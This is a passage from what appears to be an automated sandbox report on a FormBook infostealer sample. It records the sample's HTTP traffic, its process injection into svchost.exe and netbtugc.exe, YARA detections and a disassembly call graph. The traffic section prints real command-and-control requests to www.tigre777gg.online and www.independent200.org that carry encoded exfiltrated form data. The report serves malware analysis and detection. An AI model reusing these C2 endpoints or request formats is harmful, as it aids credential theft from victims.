R4v1LYZexb8z10960m4Im6LHyv5p4UbaRN [TRUNCATED]
                              Sep 11, 2024 14:26:12.824970961 CEST154INHTTP/1.1 403 Forbidden
                              Content-Type: text/plain; charset=utf-8
                              Date: Wed, 11 Sep 2024 12:26:12 GMT
                              Content-Length: 11
                              Connection: close
                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                              Data Ascii: Bad Request


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.2.1149722103.42.108.46804884C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              TimestampBytes transferredDirectionData
                              Sep 11, 2024 14:26:14.491461039 CEST513OUTGET /yl6y/?yXf=QPKrZbNCTa4h9OiWdSr2LPtYKpnFP+xQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+TDdCZJ74ZBA3ZkRiMUCXQcAhgpMcC+j5S2A=&ndk=ctppWTth- HTTP/1.1
                              Host: www.independent200.org
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-US
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Sep 11, 2024 14:26:15.364213943 CEST154INHTTP/1.1 403 Forbidden
                              Content-Type: text/plain; charset=utf-8
                              Date: Wed, 11 Sep 2024 12:26:15 GMT
                              Content-Length: 11
                              Connection: close
                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                              Data Ascii: Bad Request


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.2.11497233.33.130.190804884C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              TimestampBytes transferredDirectionData
                              Sep 11, 2024 14:26:20.414041996 CEST788OUTPOST /06rp/ HTTP/1.1
                              Host: www.tigre777gg.online
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 200
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.tigre777gg.online
                              Referer: http://www.tigre777gg.online/06rp/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 76 35 67 56 72 6c 4e 6b 34 6b 67 42 49 39 62 79 75 53 76 46 61 46 6c 61 6c 76 6c 46 78 76 44 52 7a 54 52 5a 4b 42 69 31 69 2f 37 43 4c 6e 63 57 67 59 7a 4c 65 47 43 5a 43 7a 32 41 6d 64 6b 6a 6e 66 48 50 74 69 4e 55 55 51 31 2f 42 66 6a 6a 65 6e 4c 53 6e 66 4b 4d 55 4e 62 38 76 47 41 58 63 38 54 35 37 4a 64 36 33 54 41 44 53 31 2f 57 39 6d 56 37 6d 6d 76 64 4e 38 53 76 30 73 2b 68 75 44 66 67 44 6d 66 68 6d 6e 55 42 35 35 65 64 62 52 38 78 44 6b 34 44 34 6f 61 58 61 39 4b 77 6e 49 4a 63 64 68 7a 68 76 2b 56 57 75 52 72 65 77 4c 4c 79 51 3d 3d
                              Data Ascii: yXf=+gx9o4ylIYGL+v5gVrlNk4kgBI9byuSvFaFlalvlFxvDRzTRZKBi1i/7CLncWgYzLeGCZCz2AmdkjnfHPtiNUUQ1/BfjjenLSnfKMUNb8vGAXc8T57Jd63TADS1/W9mV7mmvdN8Sv0s+huDfgDmfhmnUB55edbR8xDk4D4oaXa9KwnIJcdhzhv+VWuRrewLLyQ==


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              14192.168.2.11497243.33.130.190804884C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              TimestampBytes transferredDirectionData
                              Sep 11, 2024 14:26:22.973388910 CEST808OUTPOST /06rp/ HTTP/1.1
                              Host: www.tigre777gg.online
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 220
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.tigre777gg.online
                              Referer: http://www.tigre777gg.online/06rp/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 4d 68 67 5a 71 6c 4e 68 59 6b 68 64 59 39 62 38 4f 54 6d 46 61 42 6c 61 6e 44 4c 45 44 4c 44 51 52 37 52 59 4c 42 69 35 43 2f 37 61 62 6e 64 62 41 59 34 4c 65 61 67 5a 44 2f 32 41 6d 68 6b 6a 6a 58 48 50 61 32 4f 55 45 51 33 71 52 66 68 38 4f 6e 4c 53 6e 66 4b 4d 55 70 78 38 76 4f 41 58 4e 4d 54 37 5a 68 61 6b 6e 54 44 58 43 31 2f 53 39 6d 5a 37 6d 6e 34 64 50 59 38 76 77 63 2b 68 73 4c 66 68 57 4b 59 30 57 6e 61 50 5a 34 41 64 4c 35 77 34 78 42 77 44 62 30 64 42 70 35 61 38 42 5a 54 4d 2b 6f 6b 69 38 32 58 43 49 77 62 58 42 75 43 70 52 44 6c 4f 4f 79 69 75 39 79 59 77 47 38 73 52 62 62 57 6a 56 38 3d
                              Data Ascii: yXf=+gx9o4ylIYGL+MhgZqlNhYkhdY9b8OTmFaBlanDLEDLDQR7RYLBi5C/7abndbAY4LeagZD/2AmhkjjXHPa2OUEQ3qRfh8OnLSnfKMUpx8vOAXNMT7ZhaknTDXC1/S9mZ7mn4dPY8vwc+hsLfhWKY0WnaPZ4AdL5w4xBwDb0dBp5a8BZTM+oki82XCIwbXBuCpRDlOOyiu9yYwG8sRbbWjV8=


                              Session IDSource IPSource PortDestination IPDestination Port
                              15192.168.2.11497253.33.130.19080
                              TimestampBytes transferredDirectionData
                              Sep 11, 2024 14:26:26.043894053 CEST1821OUTPOST /06rp/ HTTP/1.1
                              Host: www.tigre777gg.online
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 1232
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.tigre777gg.online
                              Referer: http://www.tigre777gg.online/06rp/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Raw: 79 58 66 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 4d 68 67 5a 71 6c 4e 68 59 6b 68 64 59 39 62 38 4f 54 6d 46 61 42 6c 61 6e 44 4c 45 44 44 44 51 69 44 52 5a 73 39 69 34 43 2f 37 54 37 6e 59 62 41 59 6c 4c 65 53 6b 5a 44 6a 6d 41 6a 74 6b 68 45 58 48 4a 6f 4f 4f 4e 30 51 33 6f 52 66 6b 6a 65 6d 52 53 6e 50 4f 4d 55 5a 78 38 76 4f 41 58 4f 55 54 79 72 4a 61 6d 6e 54 41 44 53 31 6a 57 39 6d 39 37 6d 66 6f 64 50 63 43 73 42 67 2b 69 50 6a 66 6d 67 2b 59 32 32 6e 50 4d 5a 34 49 64 4c 6b 75 34 78 74 57 44 59 6f 33 42 75 31 61 76 67 77 76 5a 2f 4d 4e 78 4e 4f 62 5a 34 35 38 59 41 43 45 69 69 58 76 65 2f 2b 4a 34 4a 36 50 2f 53 78 34 4d 4b 4b 56 2f 69 66 45 54 59 59 32 44 35 78 54 68 61 6b 48 73 65 2b 65 38 79 45 66 49 2f 34 67 69 59 35 45 53 59 78 73 45 71 65 6d 65 55 4e 38 78 59 37 64 47 34 43 77 70 35 56 45 72 68 39 39 52 56 39 68 4d 34 6c 43 4e 6b 59 54 6e 4d 7a 33 41 36 65 49 42 30 39 58 51 4e 6d 47 77 68 42 64 64 75 39 45 6a 73 54 6f 67 31 71 6e 5a 67 59 2b 35 4c 52 43 31 6d 37 34 56 75 7a 55 6e 39 [TRUNCATED]
                              Data Ascii: yXf=+gx9o4ylIYGL+MhgZqlNhYkhdY9b8OTmFaBlanDLEDDDQiDRZs9i4C/7T7nYbAYlLeSkZDjmAjtkhEXHJoOON0Q3oRfkjemRSnPOMUZx8vOAXOUTyrJamnTADS1jW9m97mfodPcCsBg+iPjfmg+Y22nPMZ4IdLku4xtWDYo3Bu1avgwvZ/MNxNObZ458YACEiiXve/+J4J6P/Sx4MKKV/ifETYY2D5xThakHse+e8yEfI/4giY5ESYxsEqemeUN8xY7dG4Cwp5VErh99RV9hM4lCNkYTnMz3A6eIB09XQNmGwhBddu9EjsTog1qnZgY+5LRC1m74VuzUn9ZJboLk0QWcDBjYoR2tp78ckLzt4yWVdkHxjhx4vUEFrQn72JQYGaURiwl0cngpBvqBpOG/n3v/iDV1K599iKcZMJES+rMIXH7ywSpHgcot9jQOTSHj2jCbtvpbMH1W8kT+7SxMLZjutfgWMjbly0J9rVCRdNHQMIQVRx05NqHBAfZHu5U6BQ6HwT1XXVeqsbPdyIiZd/R2ki0ttroJAfbwlYFnP7azENmZdWrGZ6PKirMISSUcT5Xt6zFn5dR7w+4hfppF0RBmp48fgRs+Y4lieX6sbyUwoCpXxa4scPc2edgQ8i/9Uv6nQFC1oe8Xdkft10Dz/a5S22Vjfjz11PE9oBtYxq9DcNL8m1TGPSBwX6Jrkbe0+66Ihj6v5nYGf3H/eZDd2o5+r41sS4jU6BBzNovkmxFetC41f7WXqa26OPv2JE/TieorloXTBvPGZxxL9q88qEMjy+aGZdpGgBvIoJhFMMIdN/aC12e69DhJqkS0VyNnSwMLJRJuH96ZM55wy5yHpDGZzCsRD8OG84hTjKQasWrbC8XlUshIR97ReNtIfGj/9Eao02aol+c9/G48Bb+6XhZfr/3+87C813YChKnrT3rNg6gpNltXCy2G0EIOyqQqHZiygibtCFE13YPa6OZmGj4dQ2gVTiK+HUxTQ7o5nkYmlLd3 [TRUNCATED]


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:08:24:19
                              Start date:11/09/2024
                              Path:C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe"
                              Imagebase:0xc60000
                              File size:1'209'344 bytes
                              MD5 hash:B2218F5D997FCAD8FFD678A82CA0A9B2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:2
                              Start time:08:24:20
                              Start date:11/09/2024
                              Path:C:\Windows\SysWOW64\svchost.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe"
                              Imagebase:0x650000
                              File size:46'504 bytes
                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1812298134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1812298134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1813082364.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1813082364.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:4
                              Start time:08:24:57
                              Start date:11/09/2024
                              Path:C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe"
                              Imagebase:0xba0000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2599631540.00000000031B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2599631540.00000000031B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:false

                              General

                              Target ID:5
                              Start time:08:24:58
                              Start date:11/09/2024
                              Path:C:\Windows\SysWOW64\netbtugc.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                              Imagebase:0x270000
                              File size:22'016 bytes
                              MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2599340690.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2599340690.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2597752897.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2597752897.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              Reputation:moderate
                              Has exited:false

                              General

                              Target ID:8
                              Start time:08:25:11
                              Start date:11/09/2024
                              Path:C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe"
                              Imagebase:0xba0000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:false

                              General

                              Target ID:10
                              Start time:08:25:29
                              Start date:11/09/2024
                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                              Imagebase:0x7ff6de060000
                              File size:676'768 bytes
                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:3.2%
                                Dynamic/Decrypted Code Coverage:1%
                                Signature Coverage:10%
                                Total number of Nodes:1820
                                Total number of Limit Nodes:160
                                execution_graph 108218 cd1eed 108223 c7e975 108218->108223 108220 cd1f01 108239 c81b2a 52 API calls __cinit 108220->108239 108222 cd1f0b 108224 c7ea27 GetModuleFileNameW 108223->108224 108225 c8010a 48 API calls 108223->108225 108240 c8297d 108224->108240 108225->108224 108227 c7ea5b _wcsncat 108243 c82bff 108227->108243 108231 c7ea94 _wcscpy 108255 c6d3d2 108231->108255 108235 c7eae0 Mailbox 108235->108220 108236 c6a4f6 48 API calls 108237 c7eada _wcscat __NMSG_WRITE _wcsncpy 108236->108237 108237->108235 108237->108236 108238 c8010a 48 API calls 108237->108238 108238->108237 108239->108222 108274 c829c7 108240->108274 108300 c8aab9 108243->108300 108246 c8010a 108249 c80112 __calloc_impl 108246->108249 108248 c8012c 108248->108231 108249->108248 108250 c8012e std::exception::exception 108249->108250 108312 c845ec 108249->108312 108326 c87495 RaiseException 108250->108326 108252 c80158 108327 c873cb 47 API calls _free 108252->108327 108254 c8016a 108254->108231 108256 c8010a 48 API calls 108255->108256 108257 c6d3f3 108256->108257 108258 c8010a 48 API calls 108257->108258 108259 c6d401 108258->108259 108260 c7eb05 108259->108260 108334 c6c4cd 108260->108334 108262 c7eb14 RegOpenKeyExW 108263 c7eb35 108262->108263 108264 cd4b17 RegQueryValueExW 108262->108264 108263->108237 108265 cd4b91 RegCloseKey 108264->108265 108266 cd4b30 108264->108266 108267 c8010a 48 API calls 108266->108267 108268 cd4b49 108267->108268 108338 c64bce 108268->108338 108271 cd4b6f 108341 c67e53 108271->108341 108273 cd4b86 108273->108265 108275 c829d6 108274->108275 108276 c829e2 108274->108276 108275->108276 108283 c82a55 108275->108283 108293 c8a9fb 47 API calls __mbsnbicoll_l 108275->108293 108298 c8889e 47 API calls __getptd_noexit 108276->108298 108278 c82b9a 108288 c829c2 108278->108288 108299 c87aa0 8 API calls __mbsnbicoll_l 108278->108299 108281 c82b21 108281->108276 108284 c82b31 108281->108284 108281->108288 108282 c82ae0 108282->108276 108285 c82afc 108282->108285 108295 c8a9fb 47 API calls __mbsnbicoll_l 108282->108295 108283->108276 108292 c82ac2 108283->108292 108294 c8a9fb 47 API calls __mbsnbicoll_l 108283->108294 108297 c8a9fb 47 API calls __mbsnbicoll_l 108284->108297 108285->108276 108287 c82b12 108285->108287 108285->108288 108296 c8a9fb 47 API calls __mbsnbicoll_l 108287->108296 108288->108227 108292->108281 108292->108282 108293->108283 108294->108292 108295->108285 108296->108288 108297->108288 108298->108278 108299->108288 108301 c8aaca 108300->108301 108302 c8abc6 108300->108302 108301->108302 108305 c8aad5 108301->108305 108310 c8889e 47 API calls __getptd_noexit 108302->108310 108304 c8abbb 108311 c87aa0 8 API calls __mbsnbicoll_l 108304->108311 108308 c7ea8a 108305->108308 108309 c8889e 47 API calls __getptd_noexit 108305->108309 108308->108246 108309->108304 108310->108304 108311->108308 108313 c84667 __calloc_impl 108312->108313 108316 c845f8 __calloc_impl 108312->108316 108333 c8889e 47 API calls __getptd_noexit 108313->108333 108314 c84603 108314->108316 108328 c88e52 47 API calls __NMSG_WRITE 108314->108328 108329 c88eb2 47 API calls 6 library calls 108314->108329 108330 c81d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108314->108330 108316->108314 108319 c8462b RtlAllocateHeap 108316->108319 108321 c84653 108316->108321 108324 c84651 108316->108324 108318 c8465f 108318->108249 108319->108316 108319->108318 108331 c8889e 47 API calls __getptd_noexit 108321->108331 108332 c8889e 47 API calls __getptd_noexit 108324->108332 108326->108252 108327->108254 108328->108314 108329->108314 108331->108324 108332->108318 108333->108318 108335 c6c4e7 108334->108335 108336 c6c4da 108334->108336 108337 c8010a 48 API calls 108335->108337 108336->108262 108337->108336 108339 c8010a 48 API calls 108338->108339 108340 c64be0 RegQueryValueExW 108339->108340 108340->108271 108340->108273 108342 c67ecf 108341->108342 108345 c67e5f __NMSG_WRITE 108341->108345 108354 c6a2fb 108342->108354 108344 c67e85 _memmove 108344->108273 108346 c67ec7 108345->108346 108347 c67e7b 108345->108347 108353 c67eda 48 API calls 108346->108353 108350 c6a6f8 108347->108350 108351 c8010a 48 API calls 108350->108351 108352 c6a702 108351->108352 108352->108344 108353->108344 108355 c6a321 _memmove 108354->108355 108356 c6a309 108354->108356 108355->108344 108356->108355 108358 c6b8a7 108356->108358 108359 c6b8ba 108358->108359 108361 c6b8b7 _memmove 108358->108361 108360 c8010a 48 API calls 108359->108360 108360->108361 108361->108355 108362 c629c2 108363 c629cb 108362->108363 108364 c62a48 108363->108364 108365 c629e9 108363->108365 108403 c62a46 108363->108403 108369 c62a4e 108364->108369 108370 cd2307 108364->108370 108366 c629f6 108365->108366 108367 c62aac PostQuitMessage 108365->108367 108374 cd238f 108366->108374 108375 c62a01 108366->108375 108376 c62a39 108367->108376 108368 c62a2b DefWindowProcW 108368->108376 108371 c62a76 SetTimer RegisterWindowMessageW 108369->108371 108372 c62a53 108369->108372 108411 c6322e 16 API calls 108370->108411 108371->108376 108380 c62a9f CreatePopupMenu 108371->108380 108377 cd22aa 108372->108377 108378 c62a5a KillTimer 108372->108378 108426 ca57fb 60 API calls _memset 108374->108426 108381 c62ab6 108375->108381 108382 c62a09 108375->108382 108390 cd22af 108377->108390 108391 cd22e3 MoveWindow 108377->108391 108407 c62b94 Shell_NotifyIconW _memset 108378->108407 108379 cd232e 108412 c7ec33 346 API calls Mailbox 108379->108412 108380->108376 108409 c61e58 53 API calls _memset 108381->108409 108386 c62a14 108382->108386 108387 cd2374 108382->108387 108393 c62a1f 108386->108393 108394 cd235f 108386->108394 108387->108368 108425 c9b31f 48 API calls 108387->108425 108388 cd23a1 108388->108368 108388->108376 108396 cd22b3 108390->108396 108397 cd22d2 SetFocus 108390->108397 108391->108376 108392 c62a6d 108408 c62ac7 DeleteObject DestroyWindow Mailbox 108392->108408 108393->108368 108413 c62b94 Shell_NotifyIconW _memset 108393->108413 108424 ca5fdb 70 API calls _memset 108394->108424 108395 c62ac5 108395->108376 108396->108393 108401 cd22bc 108396->108401 108397->108376 108410 c6322e 16 API calls 108401->108410 108403->108368 108405 cd2353 108414 c63598 108405->108414 108407->108392 108408->108376 108409->108395 108410->108376 108411->108379 108412->108393 108413->108405 108415 c635c3 _memset 108414->108415 108427 c638c4 108415->108427 108419 c63666 Shell_NotifyIconW 108431 c638e4 108419->108431 108420 cd45c2 Shell_NotifyIconW 108422 c63648 108422->108419 108422->108420 108423 c6367b 108423->108403 108424->108395 108425->108403 108426->108388 108428 cd44d1 108427->108428 108429 c63618 108427->108429 108428->108429 108430 cd44da DestroyIcon 108428->108430 108429->108422 108453 ca6237 61 API calls _W_store_winword 108429->108453 108430->108429 108432 c639d5 Mailbox 108431->108432 108433 c63900 108431->108433 108432->108423 108454 c67b6e 108433->108454 108436 cd453f LoadStringW 108440 cd4559 108436->108440 108437 c6391b 108438 c67e53 48 API calls 108437->108438 108439 c63930 108438->108439 108439->108440 108441 c63941 108439->108441 108461 c639e8 48 API calls 2 library calls 108440->108461 108443 c639da 108441->108443 108444 c6394b 108441->108444 108460 c6c935 48 API calls 108443->108460 108459 c639e8 48 API calls 2 library calls 108444->108459 108445 cd4564 108448 cd4578 108445->108448 108450 c63956 _memset _wcscpy 108445->108450 108462 c639e8 48 API calls 2 library calls 108448->108462 108452 c639ba Shell_NotifyIconW 108450->108452 108451 cd4586 108452->108432 108453->108422 108455 c8010a 48 API calls 108454->108455 108456 c67b93 108455->108456 108457 c6a6f8 48 API calls 108456->108457 108458 c6390e 108457->108458 108458->108436 108458->108437 108459->108450 108460->108450 108461->108445 108462->108451 108463 cd1edb 108468 c6131c 108463->108468 108465 cd1ee1 108501 c81b2a 52 API calls __cinit 108465->108501 108467 cd1eeb 108469 c6133e 108468->108469 108502 c61624 108469->108502 108474 c6d3d2 48 API calls 108475 c6137e 108474->108475 108476 c6d3d2 48 API calls 108475->108476 108477 c61388 108476->108477 108478 c6d3d2 48 API calls 108477->108478 108479 c61392 108478->108479 108480 c6d3d2 48 API calls 108479->108480 108481 c613d8 108480->108481 108482 c6d3d2 48 API calls 108481->108482 108483 c614bb 108482->108483 108510 c61673 108483->108510 108487 c614eb 108488 c6d3d2 48 API calls 108487->108488 108489 c614f5 108488->108489 108539 c6175e 108489->108539 108491 c61540 108492 c61550 GetStdHandle 108491->108492 108493 cd58da 108492->108493 108494 c615ab 108492->108494 108493->108494 108496 cd58e3 108493->108496 108495 c615b1 CoInitialize 108494->108495 108495->108465 108546 ca9bd1 53 API calls 108496->108546 108498 cd58ea 108547 caa2f6 CreateThread 108498->108547 108500 cd58f6 CloseHandle 108500->108495 108501->108467 108548 c617e0 108502->108548 108505 c67e53 48 API calls 108506 c61344 108505->108506 108507 c616db 108506->108507 108562 c61867 6 API calls 108507->108562 108509 c61374 108509->108474 108511 c6d3d2 48 API calls 108510->108511 108512 c61683 108511->108512 108513 c6d3d2 48 API calls 108512->108513 108514 c6168b 108513->108514 108563 c67d70 108514->108563 108517 c67d70 48 API calls 108518 c6169b 108517->108518 108519 c6d3d2 48 API calls 108518->108519 108520 c616a6 108519->108520 108521 c8010a 48 API calls 108520->108521 108522 c614c5 108521->108522 108523 c616f2 108522->108523 108524 c61700 108523->108524 108525 c6d3d2 48 API calls 108524->108525 108526 c6170b 108525->108526 108527 c6d3d2 48 API calls 108526->108527 108528 c61716 108527->108528 108529 c6d3d2 48 API calls 108528->108529 108530 c61721 108529->108530 108531 c6d3d2 48 API calls 108530->108531 108532 c6172c 108531->108532 108533 c67d70 48 API calls 108532->108533 108534 c61737 108533->108534 108535 c8010a 48 API calls 108534->108535 108536 c6173e 108535->108536 108537 c61747 RegisterWindowMessageW 108536->108537 108538 cd24a6 108536->108538 108537->108487 108540 cd67dd 108539->108540 108541 c6176e 108539->108541 108568 cad231 50 API calls 108540->108568 108543 c8010a 48 API calls 108541->108543 108545 c61776 108543->108545 108544 cd67e8 108545->108491 108546->108498 108547->108500 108569 caa2dc 54 API calls 108547->108569 108555 c617fc 108548->108555 108551 c617fc 48 API calls 108552 c617f0 108551->108552 108553 c6d3d2 48 API calls 108552->108553 108554 c6165b 108553->108554 108554->108505 108556 c6d3d2 48 API calls 108555->108556 108557 c61807 108556->108557 108558 c6d3d2 48 API calls 108557->108558 108559 c6180f 108558->108559 108560 c6d3d2 48 API calls 108559->108560 108561 c617e8 108560->108561 108561->108551 108562->108509 108564 c6d3d2 48 API calls 108563->108564 108565 c67d79 108564->108565 108566 c6d3d2 48 API calls 108565->108566 108567 c61693 108566->108567 108567->108517 108568->108544 108570 cd1e8b 108575 c7e44f 108570->108575 108574 cd1e9a 108576 c8010a 48 API calls 108575->108576 108577 c7e457 108576->108577 108578 c7e46b 108577->108578 108583 c7e74b 108577->108583 108582 c81b2a 52 API calls __cinit 108578->108582 108582->108574 108584 c7e463 108583->108584 108585 c7e754 108583->108585 108587 c7e47b 108584->108587 108615 c81b2a 52 API calls __cinit 108585->108615 108588 c6d3d2 48 API calls 108587->108588 108589 c7e492 GetVersionExW 108588->108589 108590 c67e53 48 API calls 108589->108590 108591 c7e4d5 108590->108591 108616 c7e5f8 108591->108616 108597 cd29f9 108599 c7e576 108601 c7e59e 108599->108601 108602 c7e5ec GetSystemInfo 108599->108602 108600 c7e55f GetCurrentProcess 108633 c7e70e LoadLibraryA GetProcAddress 108600->108633 108627 c7e694 108601->108627 108604 c7e5c9 108602->108604 108607 c7e5d7 FreeLibrary 108604->108607 108608 c7e5dc 108604->108608 108607->108608 108608->108578 108609 c7e5e4 GetSystemInfo 108611 c7e5be 108609->108611 108610 c7e5b4 108630 c7e437 108610->108630 108611->108604 108614 c7e5c4 FreeLibrary 108611->108614 108614->108604 108615->108584 108617 c7e601 108616->108617 108618 c6a2fb 48 API calls 108617->108618 108619 c7e4dd 108618->108619 108620 c7e617 108619->108620 108621 c7e625 108620->108621 108622 c6a2fb 48 API calls 108621->108622 108623 c7e4e9 108622->108623 108623->108597 108624 c7e6d1 